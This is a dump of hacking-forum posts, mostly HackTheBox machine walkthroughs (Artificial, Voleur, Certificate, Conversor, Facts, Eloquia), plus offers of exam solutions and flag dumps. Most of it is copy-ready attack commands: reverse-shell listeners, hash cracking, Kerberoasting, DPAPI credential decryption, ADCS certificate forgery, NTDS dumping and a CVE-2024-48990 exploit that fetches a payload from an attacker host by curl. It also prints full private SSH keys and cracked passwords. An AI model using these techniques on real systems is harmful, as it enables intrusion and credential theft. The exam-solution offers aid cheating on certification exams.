PwnForums - HackTheBox

SUMMUS: Extreme Red Teamer Lab

Tue, 10 Feb 2026 15:37:16 +0000

Has anyone done then the SUMMUS: Extreme Red Teamer Lab?

Can anyone share writeup?

HTB - ARTIFICIAL.HTB - EASY LINUX

Tue, 10 Feb 2026 14:12:52 +0000

ARTIFICIAL - HACKTHEBOX
LINUX - EASY
IP: 10.10.11.74
dn: artificial.htb

Initial access
---------------------------------------
Vuln: https://splint.gitbook.io/cyberblog/secu...ious-model
Webapp allows uploading TensorFlow H5 models - executes Lambda layer code during inference

exploit.py: https://pastebin.com/cWyDqzv0 (waf block the code)

Build exploit (must be in docker or right env):

docker run -it --rm \
-v "$PWD":/workspace \
-w /workspace \
tensorflow/tensorflow:2.13.0 python3 exploit.py

Execute:
# Listener
nc -lvnp 1337

# Upload exploit.h5 via web interface
# Click "Show Prediction" to trigger payload
# Shell as uid-100 (app group)

DB Creds extract
-------------------
Find SQLite DB:
find . -name "*.db" 2>/dev/null
sqlite3 users.db
.tables
SE/LECT * FR/OM user; (REMOVE THE SLASH, WAF BLOCK ME)

Extracted hashes:
gael:c99175974b6e192936d97224638a34f8
mark:0f3d8c76530022670f1c6029eed09ccb
robert:b606c5f5136170f15444251665638b36
royer:bc25b1f80f544c0ab451c02a3dca9fc6
mary:bf041041e57f1aff3be7ea1abd6129d0

Crack with john:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt

Cracked:
gael:mattp005numbertwo
royer:marwinnarak043414036

SSH Access
------------------
ssh gael@artificial.htb
password: mattp005numbertwo
cat user.txt

Port discover
--------------
netstat -tlnp | grep 127.0.0.1
Found port 9898 on 127.0.0.1 LISTEN

Port forwarding:
ssh -L 9898:127.0.0.1:9898 gael@artificial.htb

BACKREST recon
--------------
Creds already found dont work - need to search for backup on server

find / -type f -name "*backup*" 2>/dev/null
Found: /var/backups/backrest_backup.tar.gz

Download and extract backrest_backup.tar.gz:
├── backrest
├── .config
│ └── backrest
│ └── config.json
├── install.sh
├── jwt-secret
├── oplog.sqlite
├── oplog.sqlite.lock
├── oplog.sqlite-shm
├── oplog.sqlite-wal
├── processlogs
│ └── backrest.log
├── restic
└── tasklogs
├── .inprogress
├── logs.sqlite
├── logs.sqlite-shm
└── logs.sqlite-wal

in config.json:

"name": "backrest_root",
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"

Crack bcrypt hash:
echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d > hash.bcrypt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.bcrypt

Password: backrest_root:!@#$%^

Privesc
------------------------
Backrest access:
URL: http://localhost:9898
Creds: backrest_root / !@#$%^

Create repo first before creating plan:
Name: test
Type: Local
Path: /tmp

Create backup plan to grab root.txt:
Name: exploit
Repository: test
Paths: /root/

Get root.txt:
1. Execute backup via "Backup Now"
2. Wait for green status
3. Click completed backup → "Snapshot Browser"
4. Navigate to /root/root.txt in snapshot browser
5. Restore to /etc/root
6. Download restored file

Got root.txt flag
(can also get revshell with hook command option in plan)

Credentials summary (for noob)
-------------------
gael:mattp005numbertwo (SSH)
royer:marwinnarak043414036 (cracked hash)
backrest_root:!@#$%^ (Backrest web interface)

Exam solutions

Mon, 09 Feb 2026 18:05:25 +0000

DM me in discord.com/users/1205111888346742887 () if you are interested in exams solution

HTB - VOLEUR.HTB - MEDIUM WINDOWS

Mon, 09 Feb 2026 17:00:53 +0000

VOLEUR - HACKTHEBOX
WINDOWS - MEDIUM

Can provide my personal notes for the machine if anyone's interested

IP: 10.10.11.76
Domain: voleur.htb
DC: dc.voleur.htb

KRB5.CONF Setup
---------------
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false

[realms]
VOLEUR.HTB = {
kdc = dc.voleur.htb
}

[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB

Initial access (w given creds)
-----------------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache

SMB ENUM
---------------
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"

Download encrypted Excel:
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT

Crack EXCEL pass
--------------------
office2john Access_Review.xlsx > xlsx.h
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txt
Result: football1

Decrypt n extract creds
------------------------
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'

Found creds:
Todd.Wolfe - Password reset to NightT1meP1dg3on14, account deleted
svc_ldap - M1XyC9pW7qT5Vn
svc_iis - N5pXyW1VqM7CZ8

Targeting KERBEROASTING
-----------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txt

Got TGS hash:
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$cf6535bc0a95a2ed7b815852807efa4a$7c691543631009fafbab519015753c7a698f46eee1f81172b80fdc7870973917d63431bf32a302be9e41e8e8673c0c5fb3c532d0519992ccf29cdbf734110ea318f7c273267f5bd44ff89c3090a539c1c073b0ffce1271c0996951f850d627dd711136fc4b43d432339fe3ccb9b2cb5f80537dfab041dbed384d655a636ce03009d0f075c0ae151314739b464487e8db54661ae9b20dd4585ab895bfbc972979fe1cbccccfb1855e0b5b4b389ef54c26aa443e4db34d31ba325ffa413e7ff2411fe6f39abea6b62b9d20293aa9db7dbb422a108c2dcd357ebb4268255d182f2c06b682e98b56b7cf8094f50285e300c3cdf7f71054b14e0e04ac0d3d68644c290356457b55e6334054874aaa3d3eb6770f3fd859455ce5778532316cb3260f565bcafd7c7d2f144a55aa4447516ab48cbabf63f34b436164c69c0d304be917a8032406cdfa8d2c3b69ef545490ae5e6f109e6455445739b6283da1e819fbbbf0649b4b740cb444c7e38bc49ddb7372836c4a61039e3437165fd06231000cd41f5917494ab462999d0a885b3742dad0b3ca480a25bad5087c90d30f95633c5e3e105201cf82e7874ef0f1c15c1b88585ab5dddbf006e6b06b215eb3b8d23d7edc8da5f6e7bde088315e764129c6901d22922c5aa379c401a8dde101bf71d8f3dafacc33b994f807d1ae5138db18fd1757bf31eae41c98c6a68bc50809fca7973039c4899f878174a0933d69a8fa7eaa1eb8dd5688b319f66c7e3bc463f9bf92a9cc8bb96e740be99f8b74371ac102aafde1b96a1860f8478335296ff9d2827710349c61862e4c8b0dbaa4cbd62276e3a14075d3b70038fc25842e3210844fa7bf7cc1da0a209c08cf219fc0148ef19bd5efcb9d0bbacace0749fb18e665fa73b137952cbaf364005d5e6b1b70e916ef553d015de218974f5f5bbc7b677b5eb062ff2735a263f8afe77cc73f1acb026a33ebd5037990ddb8f108a5aeee0146a72ebf167a65c1bd0a1b68b0d4f283f3a1c688aba30b4169505def1b541010d2e54ab51ddcf1699bb3343d6a817a227a7c9df8d75c43d4da4eba17c6eed4d72b2450138e2135d80ffeb4d6393c95ad0bf28f74d43c960f6f6cc0aec28e07c5eb36b2665a2d261cfed516dd3cc459411da99ffa2d5dabc5c9dc899f537ef6add3deef15526fbb5175664c1f514f17c13de74c6d01f19b6ee93e911dbcc2a2b4b10e9a31aaf3c0fb6ed4a39e8a85a2b09c7b3c79b3f2b79345779d0aeef29c1d84d77a02f73e4f25bca3391c9795531bbd3c6fa371a69afa1c38185bfd47de627f8bf11601322bf16ddb73c68af700e3eccc901665cf4c227c4a6cb5f952ab35969934d40ae5699f6fe41dd0f839eaff4cb78a02023db6692d9ddf56dccdc3d3f33d934fc972bc2671c1e2a04bb97ddec87927918fb8b94ab59f9d6bbf13f08b100d767cce7c0ed386c4b64f9a11ebe387ed8e281106

Crack TGS:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txt
Result: svc_winrm:AFireInsidedeOzarctica980219afi

WINRM Access
-------------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'
export KRB5CCNAME=FILEvc_winrm.ccache
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

Restore deleted user
----------------------------------
$cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))
Import-Module ActiveDirectory
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential $cred | Restore-ADObject -Credential $cred
Get-ADUser todd.wolfe

Access TODD.WOLFE SMB Share
---------------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb

use IT
cd Second-Line Support
cd Archived Users
cd todd.wolfe

DPAPI Creds extract
----------------------------
Found DPAPI protected creds in AppData/Roaming/Microsoft/

Extract masterkey:
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"

Masterkey:
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Decrypt creds:
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Result:
Username: jeremy.combs
Password: qT3V9pLXyN7W4m

JEREMY.COMBS Access
-------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'
export KRB5CCNAME=FILE:jeremy.combs.ccache

evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (works but useless)

KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htb

SSH KEY Discover
-----------------
Found in SMB share:

note.txt.txt:
"Jeremy, I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux. Please see what you can set up. Thanks, Admin"

id_rsa:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

SSH access via WSL
--------------------------------
chmod 400 id_rsa
ssh -p 2222 -i id_rsa svc_backup@voleur.htb

AD Database extract
----------------------
Found in /mnt/c/IT/THIRD-LINE SUPPORT/:
./Active Directory: ntds.dit ntds.jfm
./registry: SECURITY SYSTEM

Extract NTLM hashes:
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL

Administrator hash:
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::

Admin Access
-----------
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator
export KRB5CCNAME=FILE:administrator.ccache
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

CREDENTIALS SUMMARY (for noobs)
-------------------
ryan.naylor:HollowOct31Nyt (Initial access)
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)
svc_ldap:M1XyC9pW7qT5Vn (Excel file)
svc_iis:N5pXyW1VqM7CZ8 (Excel file)
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)

HTB - CERTIFICATE.HTB - HARD WINDOWS

Mon, 09 Feb 2026 16:49:01 +0000

CERTIFICATE - HACKTHEBOX
WINDOWS - HARD
(if you want my detailed cheat sheet with more explanations just ask)

IP: 10.10.11.71
Hostname: certificate.htb
Domain: CERTIFICATE.HTB

Initial access
----------------------------------------
Web app has file upload restrictions - bypassed via ZIP concatenation

Exploit:
echo "test" > good.pdf
echo "" > x.php (REMOVE THE SLASH IN SYSTEM, ITS JUST 4 WAF BYPASS)
zip good.zip good.pdf
zip bad.zip x.php
cat good.zip bad.zip > final.zip

Upload at: http://certificate.htb/upload.php?s_id=44
Upload final.zip -> access webshell via x.php as xamppuser

DB Enum
--------------------
Found creds in db.php: certificate_webapp_user:cert!f!c@teDBPWD

MySQL queries (non-interactive shell): https://pastebin.com/Ni8az3vw (waf blocked me)

Extracted hash:
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
(other hashes didn't crack)

Cracked with hashcat:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
Result: sara.b:Blink182

WINRM + PCAP Analysis
---------------------
evil-winrm -u "sara.b" -p "Blink182" -i "10.10.11.71"

Found Kerberos AS-REQ in ~/ws-01/WS-01PktMon.pcap

Extract cipher with tshark:
tshark -r WS-01PktMon.pcap -Y "kerberos.msg_type==10 && kerberos.CNameString && kerberos.realm && kerberos.cipher" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher

Cipher: 23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

Format for hashcat:
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

Crack:
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt -a 0
Result: lion.sk:!QAZ2wsx

ADCS ESC3 EXPLOIT
----------------------
evil-winrm -u "lion.sk" -p "!QAZ2wsx" -i "10.10.11.71"

Enumerate ADCS:
certipy find -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -vulnerable

ESC3 conditions found:
- Extended Key Usage: Certificate Request Agent
- Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers (lion.sk is member)
- Authorized Signatures Required: 0
- Private Key Flag: ExportableKey

Exploit ESC3:
# Step 1: Request delegation cert
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'

# Step 2: Request cert on behalf of ryan.k
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of ryan.k -pfx lion.sk.pfx
(for -template use one with client auth enabled and lion.sk enrollment rights)

# Step 3: Auth with cert
ntpdate certificate.htb
certipy auth -pfx ryan.k.pfx

Got NTLM hash:
ryan.k@certificate.htb: aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6

Privesc
----------------------------------
evil-winrm -u "ryan.k" -H "b1bc3d70e70f4f36b1509a65ae1a2ae6" -i 10.10.11.71

Download and run SeManageVolumeExploit: https://github.com/CsEnox/SeManageVolume...tag/public

Verify with: icacls C:/windows
Should show BUILTIN\Users with (M) modify permissions
(if you see "administrator" instead of "users" rerun exploit)

CA private key extract
---------------------------------
(tried DLL hijacking but EDR blocked it :trolled

Export CA private key:
certutil -exportPFX my "Certificate-LTD-CA" C:\temp\x.pfx
Download x.pfx to attacker box

Forge admin cert:
certipy forge -ca-pfx x.pfx -upn 'administrator@certificate.htb' -out system.pfx

Auth as admin:
ntpdate certificate.htb
certipy auth -pfx system.pfx

Got admin hash:
administrator@certificate.htb: aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6

Credential summary (for noobs)
-------------------------------------------
sara.b:Blink182 (WinRM)
lion.sk:!QAZ2wsx (WinRM)
certificate_webapp_user:cert!f!c@teDBPWD (MySQL)
ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pass-the-Hash)
administrator:d804304519bf0143c14cbf1c024408c6 (Pass-the-Hash)

HTB - CONVERSOR.HTB - EASY LINUX

Mon, 09 Feb 2026 16:36:42 +0000

CONVERSOR - HACKTHEBOX
LINUX - EASY
IP: 10.10.11.1 (OLD)

recon
-----
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.10.11.1 (ctf command)

22/tcp - SSH OpenSSH 8.9p1
80/tcp - HTTP Apache httpd 2.4.52

Interesting endpoint:
/convert - XML/XSLT template upload

inital access
------------------------------
App allows XSLT template uploads. Downloaded source code, install.md reveals cron job executes all Python scripts in /scripts/ every minute.

Malicious XSLT payload: https://pastebin.com/yXUvZ8es (bf block me )

Get shell:
1. Start listener
2. Upload payload via web interface
3. Wait for cron job execution (every 1 min)
4. python3 -c 'import pty;pty.spawn("/bin/bash")'

Credentials extract
----------------------------------
Source code contains SQLite DB users.db

sqlite3 users.db
.tables
S/ELECT * F/ROM users; (remove the slash, waf block me)

MD5 hash:
fismathack:5b5c3ac3a1c897c94caad48e6c71fdec

Cracked via CrackStation:
fismathack:Keepmesafeandwarm

SSH access:
ssh fismathack@conversor.htb

Privesc
-------
sudo -l

User fismathack may run the following commands on conversor:
(ALL : ALL) NOPASSWD: /usr/sbin/needrestart

Check version:
/usr/sbin/needrestart --version

needrestart 3.7 - Restart daemons after library updates.

Vulnerable to CVE-2024-48990 (patched in 3.8)

CVE-2024-48990 Exploit
---------------------------
Vuln allows Python injection via PYTHONPATH when needrestart runs with sudo

Create malicious shared object (exploit.c): https://pastebin.com/cVZYXxRx

Compile:
gcc -shared -fPIC -o __init__.so exploit.c

exploit.sh:
#!/bin/bash
set -e

cd /tmp
mkdir -p malicious/importlib

curl http://10.10.1X.X:8000/__init__.so -o /tmp/malicious/importlib/__init__.so

/tmp/malicious/expl.py : https://pastebin.com/necqG4Tx

cd /tmp/malicious
PYTHONPATH="$PWD" python3 expl.py 2>/dev/null

Terminal 1 (attacker):
python3 -m http.server 8000

Terminal 2 (victim - ssh #1):
bash exploit.sh

Terminal 3 (victim - ssh #2):
sudo /usr/sbin/needrestart

expl.py script detects SUID shell creation and executes it automatically

whoami
# root

cat /root/root.txt

Credentials summary (4 noob)
-------------------
fismathack:Keepmesafeandwarm (SSH)

---

reuploadin my old writeups not available on breachforums here, if a box already has a writeup i dont reupload, like the seasonal room pterodactyl

[Season10] USER Pterodactyl

Sun, 08 Feb 2026 02:22:41 +0000

Hidden Content

You must register or login to view this content.

[Season10] ROOT Pterodactyl

Sat, 07 Feb 2026 23:07:30 +0000

Hidden Content

You must register or login to view this content.

HTB - FACTS.HTB - EASY LINUX

Thu, 05 Feb 2026 08:36:37 +0000

FACTS - HACKTHEBOX
LINUX - EASY
IP: 10.129.69.95 (ull have a different ip)

users
-----
william
trivia

recon
-----
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95 (ctf only)

22/OpenSSH 9.9p1
80/nginx 1.26.3
- path traversal on CameleonCMS 2.9.0 CVE-2024-46987 (base vuln version 2.8.0 but works on 2.9.0)
54321/http

exploit
------------

grabbed /home/trivia/.ssh/id_ed25519 via path traversal:
http://facts.htb/admin/media/download_pr...id_ed25519 (remplate , by . for the path, BF block me)

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=
-----END OPENSSH PRIVATE KEY-----

bruteforced the passphrase:
ssh2john id_ed25519 > hash.txt
john --wordlist=rockyou.txt hash.txt
password: dragonballz

ssh login as trivia:
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)

privesc
-------
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash

mkdir -p /tmp/.exploit/facter

in /tmp/.exploit/facter/root.rb add this code: (sorry breachforum blocks me when i wanna write the code directly on the writeup, so heres a pastebin)

https://pastebin.com/Pd4vBWHZ

sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter
/bin/bash -p

got root

HTB Eloquia User and Root Flags - Insane Box

Fri, 30 Jan 2026 17:48:18 +0000

tldr:

Hidden Content

You must register or login to view this content.

Attack Path:
Review Website
Register an account on the site
Register an account using the qooqle oath
Create malicious article with html injection to force admin to register new oauth token for you
Report article to admin so trigger CSRF
Change oauth registration, use callback code in CSRF
Get Admin session

create malicious dll to get rev shell
upload to a banner as admin (we can do this now since the checks are bypassed as admin)
start listener
Go to eloquia.htb/dev/sql-explorer
Load the dll using the following
SELECT load_extension('statis/assets/images.blog/malicious.dll');
get user shell
type user.txt

Hidden Content

You must register or login to view this content.

Creds are stored in browser
Copy local_state.json and login_data.json
Crack password
Olivia.KAT:S3cureP@sswdIGu3ss
Login with evil winrm

Failure2ban service is vulnerable to being overwritten.
Overwrite with simple exe to move flag to readable directory or make a new rev shell.

Hidden Content

You must register or login to view this content.

[FREE] CPTS 12 FLAGS

Fri, 30 Jan 2026 13:00:48 +0000

a +rep is appreciated)) ^^

Hidden Content

You must register or login to view this content.

HackTheBox- Season10

Wed, 28 Jan 2026 05:18:18 +0000

HackTheBox Season 10 is starting soon. Join our Discord server so we can share everything as quickly as possible. I will give my Prolabs writeups to all users who join and remain loyal to the Discord server. I will also help with some certification exams.

Discord channel

rev_dudidudida

Mon, 26 Jan 2026 22:33:02 +0000

dudidudida.exe is done by dlang compiler that make a .d into an object and the in .exe PE32+ win executable..

i understand that the challenge is to understand the graph and his 3 nodes when you get this you can retrieve the right flag? anyone was able to did this?

HTB AirTouch

Tue, 20 Jan 2026 18:48:02 +0000

*
./udpx -t 10.129.11.209 -c 128 -w 1000

__ ______ ____ _ __
/ / / / __ \/ __ \ |/ /
/ / / / / / / /_/ / /
/ /_/ / /_/ / ____/ |
\____/_____/_/ /_/|_|
v1.0.7, by

2026/01/19 13:18:12 [+] Starting UDP scan on 1 target(s)
2026/01/19 13:18:24
[*]10.129.11.209:161 (snmp)
2026/01/19 13:18:44 [+] Scan completed

CAPE Flag 5

Sat, 17 Jan 2026 11:00:43 +0000

Hey guys,

Someone can give me a little nudge on Flag 5, I found the vulnerability between, DC01 and WS01 but my SpoolSample doesn't want to work and I fucking don't know why.

Thanks